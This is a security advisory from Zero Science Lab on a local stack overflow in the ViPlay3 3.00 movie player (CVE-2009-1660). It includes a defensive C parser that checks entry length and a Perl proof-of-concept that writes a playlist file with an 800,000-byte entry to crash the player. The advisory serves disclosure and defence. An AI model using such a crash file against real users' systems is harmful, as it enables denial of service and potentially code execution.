
ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC

2009-05-08 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS2: 9.3
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C

AI Score: 7.6
Confidence: Low

EPSS: 0.126
Percentile: 95.6%

Title: ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
Advisory ID: ZSL-2009-4913
Type: Local
Impact: System Access, DoS
Risk: (3/5)
Release Date: 08.05.2009

Summary

ViPlay3 is a freeware movie player designed to play the most popular movie types using overlaying technology for a faster and more efficient way of video playback.

Description

URUWorks ViPlay3 is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input (.vpl file). Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
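
The boundary check the description refers to, written out as an added example (this is not ViPlay3's code, which the advisory does not show). It assumes the `<index>=<path>` entry layout seen in the PoC's `[Files]` section; the function names and the 260-byte limit are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define VPL_PATH_MAX 260  /* assumed limit (Windows MAX_PATH); not from the advisory */
enum vpl_status { VPL_OK = 0, VPL_NOT_ENTRY = -1, VPL_TOO_LONG = -2 };

/* Parse one "<index>=<path>" line (length-delimited, not NUL-terminated)
 * into out[out_sz]. The value length is checked BEFORE any copy. */
static enum vpl_status vpl_parse_entry(const char *line, size_t len,
                                       char *out, size_t out_sz)
{
    size_t i = 0;
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                                 /* strip trailing CRLF */
    while (i < len && line[i] >= '0' && line[i] <= '9')
        i++;                                   /* numeric entry index */
    if (i == 0 || i >= len || line[i] != '=')
        return VPL_NOT_ENTRY;                  /* header or key such as Count= */
    size_t val_len = len - (i + 1);
    if (out_sz == 0 || val_len >= out_sz)
        return VPL_TOO_LONG;                   /* reject; never truncate or overflow */
    memcpy(out, line + i + 1, val_len);
    out[val_len] = '\0';
    return VPL_OK;
}

/* Walk a whole playlist buffer and return the number of oversized entries. */
static size_t vpl_count_oversized(const char *buf, size_t len)
{
    char path[VPL_PATH_MAX];
    size_t bad = 0, start = 0;
    while (start < len) {
        const char *nl = memchr(buf + start, '\n', len - start);
        size_t end = nl ? (size_t)(nl - buf) + 1 : len;
        if (vpl_parse_entry(buf + start, end - start, path, sizeof path) == VPL_TOO_LONG)
            bad++;
        start = end;
    }
    return bad;
}

int main(void)
{
    /* Constructed sample: one normal entry and one 1000-byte entry. */
    char big[1100] = "[Files]\r\n1=C:\\movies\\a.avi\r\n2=";
    size_t n = strlen(big);
    memset(big + n, 'A', 1000);
    printf("oversized entries: %zu\n", vpl_count_oversized(big, n + 1000));
    return 0;
}
```

The same length test can be run over `.vpl` files before they reach a player to flag entries no legitimate path would produce.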

Vendor

URUWorks - <http://www.urusoft.net>

Affected Version

3.00

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

viplay_poc.pl

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://packetstormsecurity.org/filedesc/viplay-overflow.txt.html>
[2] <http://www.securityfocus.com/bid/34877>
[3] <http://www.milw0rm.com/exploits/8644>
[4] <http://securityreason.com/exploitalert/6188>
[5] <https://vulners.com/cve/CVE-2009-1660>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2009-1660>
[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/50403>

Changelog

[08.05.2009] - Initial release
[25.10.2021] - Added reference [5], [6] and [7]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

```perl
#!/usr/bin/perl
#
# ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
#
# Product web page: http://www.urusoft.net/
# Tested on Microsoft Windows XP Professional SP3 (English)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# http://www.zeroscience.org/
# 08.05.2009

# Playlist header: [General] metadata followed by the [Files] section.
$b= "[General]\r\n".
    "Title=Proof of Concept\r\n".
    "Author=LiquidWorm\r\n".
    "Comments=2009\r\n".
    "Version=1.0\r\n".
    "[Files]\r\n".
    "Count=800000\r\n".
    "LastPlayed=0\r\n";
# Single file entry whose value is 800000 bytes long.
$c= "1=" . "A" x 800000 . "\r\n";
open a, ">./lqwrm.vpl";
print a $b.$c;
close a;
print "\n- Done!\n";
```
